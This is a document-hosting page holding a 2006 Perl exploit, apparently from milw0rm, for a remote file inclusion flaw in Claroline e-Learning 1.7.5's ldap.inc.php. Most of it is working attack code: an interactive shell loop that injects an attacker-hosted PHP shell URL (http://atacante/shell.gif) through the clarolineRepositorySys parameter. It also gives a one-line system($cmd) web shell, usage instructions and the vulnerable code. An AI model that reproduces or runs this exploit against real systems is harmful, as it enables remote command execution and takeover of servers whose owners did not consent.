Claroline eLearning 1.75 ldap.inc.php Remote File Inclusion Exploit.pdf

About Global Documents

Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.

Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.

cmd print php Claroline http File Inclusion Exploit

1 #!/usr/bin/perl
2 ############
3 # Claroline Open Source e−Learning  1.7.5 Remote File Include
4 # Exploit & Advisorie:  beford <xbefordx gmail com>
5 #
6 # uso:# 
perl own.pl <host> <cmd−shell−url> <cmd−var>
7 # 
perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd
8 #
9 # cmd shell example: <? system($cmd); ?>
10 # cmd variable: cmd;
11 #
12 #############
13 # Description
14 #############
15 # Vendor: http://www.claroline.net
16 # The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable 
17 # clarolineRepositorySys in a include() function without being declared. 
18 # There are other files vulnerable in the same folder, this exploit only
19 # attacks ldap.inc.php
20 #
21 # There is other vulnerable file claroline/auth/extauth/casProcess.inc.php
22 # it uses the claro_CasLibPath in a include function but this is not being
23 # declared either, so pwnt, RFI. Vendor was contacted through email, 
24 # no response, so i just posted this here and on its forum.
25 ############
26 # Vulnerable code (lda.inc.php)
27 ############
28 # return require $clarolineRepositorySys.’/auth/extauth/extAuthProcess.inc.php’;
29 ############
30 # Vulnerable code (casProcess.inc.php)
31 ############
32 #if (   ! isset($_SESSION[’init_CasCheckinDone’] )
33 #    || $logout
34 #    || ( basename($_SERVER[’SCRIPT_NAME’]) == ’login.php’ && isset($_REQUEST[’authModeReq’]) && $_REQUEST[’authModeR
eq’] == ’CAS’ )
35 #    || isset($_REQUEST[’fromCasServer’]) )
36 #{
37 #    include_once $claro_CasLibPath;
38 ############
39 use LWP::UserAgent;
40
41 $Path = $ARGV[0];
42 $Pathtocmd = $ARGV[1];
43 $cmdv = $ARGV[2];
44 if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
45 head();
46 while() {
47
print "[shell] \$";
48
while(<STDIN>)      {
49
$cmd=$_;
50
chomp($cmd);
51
if (!$cmd) {last;}  
Page 1/2
Claroline eLearning 1.75 ldap.inc.php Remote File Inclusion Exploit
beford
05/08/2006
52
$xpl = LWP::UserAgent−>new() or die;
53
$req = HTTP::Request−>new(GET =>$Path.’extauth/drivers/ldap.inc.php?clarolineRepositorySys=’.$Pathtocmd.’?&’.$cmdv.’=
’.$cmd)or die "\nCould Not connect\n";
54
$res = $xpl−>request($req);
55
$return = $res−>content;
56
$return =~ tr/[\n]/[ê]/;
57
if ($return =~/Error: HTTP request failed!/ ) {
58
print "\nInvalid path for phpshell\n";
59
exit;
60
} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
61
print "\nInvalid Command, error.\n\n";
62
}
63
if ($return =~ /(.*)/) {
64
$finreturn = $1;
65
$finreturn=~ tr/[ê]/[\n]/;
66
print "\r\n$finreturn\n\r";
67
last;
68
} else {
69
print "[shell] \$";
70
}
71
}
72 } last;
73
74 sub head()  { 
75
print "\n============================================================================\r\n";
76
print "  Claroline Open Source e−Learning  1.7.5 Remote File Include\r\n";
77
print "============================================================================\r\n";
78  }
79  
80 sub usage() {
81
head();
82
print " Usage: perl own.pl <host> <url−cmd> <var>\r\n\n";
83
print " <host> − Full Path to Authentication Dir : http://host/claroline/auth/do \r\n";
84
print " <url−cmd> − PhpShell : http://atacate/shell.gif \r\n";
85
print " <var> − var name used in phpshell : cmd  \r\n\r\n";
86
exit();
87  }
88
89 # milw0rm.com [2006−05−08]
Page 2/2
Claroline eLearning 1.75 ldap.inc.php Remote File Inclusion Exploit
beford
05/08/2006